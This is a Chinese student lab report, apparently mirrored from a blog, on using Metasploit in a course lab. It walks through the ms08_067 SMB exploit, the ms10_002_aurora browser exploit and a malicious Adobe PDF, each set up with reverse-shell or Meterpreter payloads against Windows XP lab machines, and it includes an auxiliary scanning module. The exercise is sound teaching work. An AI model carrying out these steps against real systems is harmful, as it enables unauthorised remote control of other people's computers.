zoukankan      html  css  js  c++  java
  • 20155304《网络对抗》MSF基础应用

    20155304《网络对抗》MSF基础应用

    实践内容

    本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

    1.1一个主动攻击实践,如ms08_067;

    1.2 一个针对浏览器的攻击,如ms11_050;

    1.3 一个针对客户端的攻击,如Adobe;

    1.4 成功应用任何一个辅助模块。

    1.1主动攻击:ms08_067

    使用靶机1和Kali

    先msfconsole进入msf,再用search ms08_067查询一下针对该漏洞的攻击模块:

    image

    用use exploit/windows/smb/ms08_067_netapi使用该模块

    用show targets查看可以被攻击的靶机的操作系统型号:

    image

    用show payloads查看可以供我们使用的攻击载荷:

    image

    从中找到一个可用的攻击载荷generic/shell_reverse_tcp,用set payload generic/shell_reverse_tcp设置payload:

    用show options查看需要设置的参数:

    image

    这里需要设置RHOST(靶机IP)和LHOST(Kali的IP)

    image

    设置target选项目标

    image

    用show options确认需要设置的参数是否已经设置好:

    image

    用exploit指令开始攻击

    攻击成功后会获取靶机的shell,可以对其进行操作:

    image

    1.2针对浏览器的攻击:MS10_002_aurora漏洞攻击

    msf > use windows/browser/ms10_002_aurora调用出该模块,然后设置tcp反弹连接

    image

    查看需要修改的参数

    image

    SRVHOST和LHOST的ip为攻击机的ip。设置好参数后,exploit

    image

    攻击成功,输入sessions -i -1,查看XP桌面信息

    image

    还有靶机的ip信息等

    image

    1.3针对客户端的攻击:adobe_toolbutton

    用search adobe查询一下针对该漏洞的攻击模块:

    image

    选择一个模块使用

    用show targets查看可以被攻击的靶机的操作系统型号:

    image

    image

    ,使用命令set payload windows/meterpreter/reverse_tcp设置payload攻击载荷

    用show options查看需要设置的参数:

    image

    image

    设置相应参数,实施exploit攻击,在/root/.msf4/local/目录下成功生成了一.pdf文件

    将pdf文件粘贴到靶机win xp

    在kali中和前几次实验一样打开并设置监听模块use exploit/multi/handler,set payload windows/meterpreter/reverse_tcp,再设置IP以及端口

    image

    在靶机上打开刚刚那个pdf文件,可以观察到Kali成功获取了靶机的shell,可以对其进行操作:

    image

    1.4 成功应用任何一个辅助模块:

    查看都有什么辅助模块:

    image

    我选择了这个

    image

    info查看、设置好要设置的参数

    image

    可以查看系统信息了:

    image

    基础问题回答

    (1)用自己的话解释什么是exploit,payload,encode.

    exploit:是破除门锁的工具以及运送间谍的载具,相当于利用漏洞偷偷打开的管道,将做好的木马病毒等顺利传输到靶机。

    payload:就是被运送的间谍,到了房子里头就可以执行各种间谍活动。简单来说就是病毒代码包装成一个可执行的文件,或者包装成指定的类型,然后通过管道传输进去后开始为我们控制靶机服务。

    encode:是间谍穿的伪装的衣服,便于间谍潜入目标针对payload进行编码,就是对它进行包装打扮,改变payload代码特征,但是不改变payload为我们所用的特征,但能对payload进行加工。

    实验总结和收获

    通过这次实验,我了解到了msf平台的厉害,不仅可以利用多种辅助模块获取靶机信息,还能够查看大部分存在的漏洞并利用这些漏洞实现不同攻击,这里面,更是可以直接实现主动攻击,只要系统存在这个漏洞,就会被直接攻破,看来,实时更新系统是很有必要的

  • 相关阅读:
    UVA1349 Optimal Bus Route Design 最优巴士路线设计
    POJ3565 Ants 蚂蚁(NEERC 2008)
    UVA1663 Purifying Machine 净化器
    UVa11996 Jewel Magic 魔法珠宝
    NEERC2003 Jurassic Remains 侏罗纪
    UVA11895 Honorary Tickets
    gdb调试coredump(使用篇)
    使用 MegaCLI 检测磁盘状态并更换磁盘
    员工直接坦诚直来直去 真性情
    山东浪潮超越3B4000申泰RM5120-L
  • 原文地址:https://www.cnblogs.com/tyn5304/p/8988086.html
Copyright © 2011-2022 走看看